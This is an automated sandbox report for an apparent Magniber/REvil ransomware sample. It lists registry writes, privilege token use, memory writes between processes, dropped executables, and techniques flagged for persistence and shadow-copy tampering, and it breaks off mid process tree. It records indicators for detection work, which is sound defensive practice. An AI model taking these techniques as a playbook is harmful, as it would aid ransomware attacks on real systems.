Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\gameux.dll,-10082 = "Games Explorer"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	ehRecvr.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\MediaPlayer\Health\{79CE5DE9-B991-4AB7-B47F-05B7BAA114AC}	wmpnetwk.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\eHome\ehepgres.dll,-304 = "Public Recorded TV"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\eHome\ehepgres.dll,-308 = "Landscapes"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\rstrui.exe,-100 = "System Restore"	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%systemroot%\system32\pmcsnap.dll,-710 = "Manages local printers and remote print servers."	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\gameux.dll,-10101 = "Internet Checkers"	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	SearchIndexer.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	SearchFilterHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{E37A73F8-FB01-43DC-914E-AAEE76095AB9} {886D8EEB-8CF2-4446-8D02-CDBA1DBDCF99} 0xFFFF = 0100000000000000202c5c028bc5da01	SearchProtocolHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%systemroot%\system32\Wdc.dll,-10025 = "Diagnose performance issues and collect performance data."	SearchProtocolHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	mscorsvw.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	mscorsvw.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SBE\SAL\CacheHashTableSize = "67"	ehRec.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@C:\Windows\system32\msinfo32.exe,-100 = "System Information"	SearchProtocolHost.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
1848	ehRec.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: 33	2068	EhTray.exe
Token: SeIncBasePriorityPrivilege	2068	EhTray.exe
Token: SeDebugPrivilege	1848	ehRec.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeRestorePrivilege	3028	msiexec.exe
Token: SeTakeOwnershipPrivilege	3028	msiexec.exe
Token: SeSecurityPrivilege	3028	msiexec.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: 33	2068	EhTray.exe
Token: SeIncBasePriorityPrivilege	2068	EhTray.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeBackupPrivilege	2404	vssvc.exe
Token: SeRestorePrivilege	2404	vssvc.exe
Token: SeAuditPrivilege	2404	vssvc.exe
Token: SeBackupPrivilege	2784	wbengine.exe
Token: SeRestorePrivilege	2784	wbengine.exe
Token: SeSecurityPrivilege	2784	wbengine.exe
Token: 33	868	wmpnetwk.exe
Token: SeIncBasePriorityPrivilege	868	wmpnetwk.exe
Token: SeManageVolumePrivilege	1324	SearchIndexer.exe
Token: 33	1324	SearchIndexer.exe
Token: SeIncBasePriorityPrivilege	1324	SearchIndexer.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeDebugPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeDebugPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeDebugPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeDebugPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeDebugPrivilege	2180	2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe
Token: SeShutdownPrivilege	2708	mscorsvw.exe
Token: SeShutdownPrivilege	2808	mscorsvw.exe

Suspicious use of FindShellTrayWindow 2 IoCs

pid	Process
2068	EhTray.exe
2068	EhTray.exe

Suspicious use of SendNotifyMessage 2 IoCs

pid	Process
2068	EhTray.exe
2068	EhTray.exe

Suspicious use of SetWindowsHookEx 17 IoCs

pid	Process
1780	SearchProtocolHost.exe
1780	SearchProtocolHost.exe
1780	SearchProtocolHost.exe
1780	SearchProtocolHost.exe
1780	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
1780	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe
2352	SearchProtocolHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2708 wrote to memory of 1140	2708	mscorsvw.exe	47
PID 2708 wrote to memory of 1140	2708	mscorsvw.exe	47
PID 2708 wrote to memory of 1140	2708	mscorsvw.exe	47
PID 2708 wrote to memory of 1888	2708	mscorsvw.exe	49
PID 2708 wrote to memory of 1888	2708	mscorsvw.exe	49
PID 2708 wrote to memory of 1888	2708	mscorsvw.exe	49
PID 2808 wrote to memory of 3000	2808	mscorsvw.exe	52
PID 2808 wrote to memory of 3000	2808	mscorsvw.exe	52
PID 2808 wrote to memory of 3000	2808	mscorsvw.exe	52
PID 2808 wrote to memory of 3000	2808	mscorsvw.exe	52
PID 2808 wrote to memory of 2632	2808	mscorsvw.exe	54
PID 2808 wrote to memory of 2632	2808	mscorsvw.exe	54
PID 2808 wrote to memory of 2632	2808	mscorsvw.exe	54
PID 2808 wrote to memory of 2632	2808	mscorsvw.exe	54
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 1368	2808	mscorsvw.exe	58
PID 2808 wrote to memory of 1368	2808	mscorsvw.exe	58
PID 2808 wrote to memory of 1368	2808	mscorsvw.exe	58
PID 2808 wrote to memory of 1368	2808	mscorsvw.exe	58
PID 2808 wrote to memory of 2432	2808	mscorsvw.exe	61
PID 2808 wrote to memory of 2432	2808	mscorsvw.exe	61
PID 2808 wrote to memory of 2432	2808	mscorsvw.exe	61
PID 2808 wrote to memory of 2432	2808	mscorsvw.exe	61
PID 2808 wrote to memory of 3052	2808	mscorsvw.exe	64
PID 2808 wrote to memory of 3052	2808	mscorsvw.exe	64
PID 2808 wrote to memory of 3052	2808	mscorsvw.exe	64
PID 2808 wrote to memory of 3052	2808	mscorsvw.exe	64
PID 2808 wrote to memory of 2872	2808	mscorsvw.exe	84
PID 2808 wrote to memory of 2872	2808	mscorsvw.exe	84
PID 2808 wrote to memory of 2872	2808	mscorsvw.exe	84
PID 2808 wrote to memory of 2872	2808	mscorsvw.exe	84
PID 2808 wrote to memory of 1680	2808	mscorsvw.exe	66
PID 2808 wrote to memory of 1680	2808	mscorsvw.exe	66
PID 2808 wrote to memory of 1680	2808	mscorsvw.exe	66
PID 2808 wrote to memory of 1680	2808	mscorsvw.exe	66
PID 2808 wrote to memory of 2272	2808	mscorsvw.exe	67
PID 2808 wrote to memory of 2272	2808	mscorsvw.exe	67
PID 2808 wrote to memory of 2272	2808	mscorsvw.exe	67
PID 2808 wrote to memory of 2272	2808	mscorsvw.exe	67
PID 1324 wrote to memory of 1780	1324	SearchIndexer.exe	68
PID 1324 wrote to memory of 1780	1324	SearchIndexer.exe	68
PID 1324 wrote to memory of 1780	1324	SearchIndexer.exe	68
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 2808 wrote to memory of 2876	2808	mscorsvw.exe	69
PID 1324 wrote to memory of 808	1324	SearchIndexer.exe	70
PID 1324 wrote to memory of 808	1324	SearchIndexer.exe	70
PID 1324 wrote to memory of 808	1324	SearchIndexer.exe	70
PID 2808 wrote to memory of 2072	2808	mscorsvw.exe	71
PID 2808 wrote to memory of 2072	2808	mscorsvw.exe	71
PID 2808 wrote to memory of 2072	2808	mscorsvw.exe	71
PID 2808 wrote to memory of 2072	2808	mscorsvw.exe	71
PID 2808 wrote to memory of 1664	2808	mscorsvw.exe	79
PID 2808 wrote to memory of 1664	2808	mscorsvw.exe	79
PID 2808 wrote to memory of 1664	2808	mscorsvw.exe	79
PID 2808 wrote to memory of 1664	2808	mscorsvw.exe	79
PID 2808 wrote to memory of 1728	2808	mscorsvw.exe	81
PID 2808 wrote to memory of 1728	2808	mscorsvw.exe	81
PID 2808 wrote to memory of 1728	2808	mscorsvw.exe	81
PID 2808 wrote to memory of 1728	2808	mscorsvw.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-23_79527ada2268a9f517373d4ce0465bfd_magniber_revil.exe"
1⤵
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2180

C:\Windows\System32\alg.exe
C:\Windows\System32\alg.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
PID:2580

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
1⤵
- Executes dropped EXE
PID:2640

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:2600

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
1⤵
- Executes dropped EXE
PID:2348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2808
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1ec -InterruptEvent 1d8 -NGENProcess 1dc -Pipe 1e8 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:3000
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 1d8 -NGENProcess 1dc -Pipe 1ec -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2632
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 260 -NGENProcess 250 -Pipe 24c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2876
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 25c -NGENProcess 268 -Pipe 1d8 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1368
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 248 -NGENProcess 250 -Pipe 1f4 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2432
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 254 -NGENProcess 264 -Pipe 260 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:3052
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 270 -NGENProcess 244 -Pipe 25c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2872
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 274 -NGENProcess 264 -Pipe 268 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1680
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 27c -NGENProcess 26c -Pipe 278 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2272
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 270 -NGENProcess 280 -Pipe 274 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2876
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 284 -NGENProcess 270 -Pipe 240 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2072
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 254 -NGENProcess 1dc -Pipe 264 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1664
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 26c -NGENProcess 288 -Pipe 284 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 244 -NGENProcess 1dc -Pipe 280 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1592
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 244 -InterruptEvent 290 -NGENProcess 254 -Pipe 28c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2104
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 294 -NGENProcess 26c -Pipe 248 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1300
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 270 -NGENProcess 254 -Pipe 288 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1704
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 2a0 -NGENProcess 244 -Pipe 29c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1664
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a0 -InterruptEvent 250 -NGENProcess 1dc -Pipe 26c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1444
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 270 -NGENProcess 2a4 -Pipe 2a0 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1728
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 270 -NGENProcess 298 -Pipe 1dc -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1576
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 2ac -NGENProcess 2a4 -Pipe 254 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:768
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ac -InterruptEvent 244 -NGENProcess 258 -Pipe 294 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2872

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
1⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2708
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 1cc -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1140
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 1cc -NGENProcess 1d0 -Pipe 1e0 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1888
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 24c -InterruptEvent 210 -NGENProcess 200 -Pipe 1c8 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1520
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 210 -InterruptEvent 260 -NGENProcess 248 -Pipe 25c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2264
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 264 -NGENProcess 250 -Pipe 258 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:1492
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 268 -NGENProcess 200 -Pipe 234 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2328
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 26c -NGENProcess 248 -Pipe 1bc -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2464
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 200 -NGENProcess 248 -Pipe 260 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2692
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 200 -InterruptEvent 278 -NGENProcess 270 -Pipe 274 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2140
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 278 -InterruptEvent 270 -NGENProcess 26c -Pipe 24c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2564
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 270 -InterruptEvent 280 -NGENProcess 248 -Pipe 250 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2752
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 248 -NGENProcess 278 -Pipe 27c -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:308
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 288 -NGENProcess 26c -Pipe 200 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:324
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 248 -NGENProcess 284 -Pipe 254 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  PID:2868
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 248 -InterruptEvent 264 -NGENProcess 28c -Pipe 270 -Comment "NGen Worker Process"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2692
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 28c -NGENProcess 288 -Pipe 26c -Comment "NGen Worker Process"
  2⤵
  PID:1760
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 298 -NGENProcess 284 -Pipe 280 -Comment "NGen Worker Process"
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  PID:2924
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
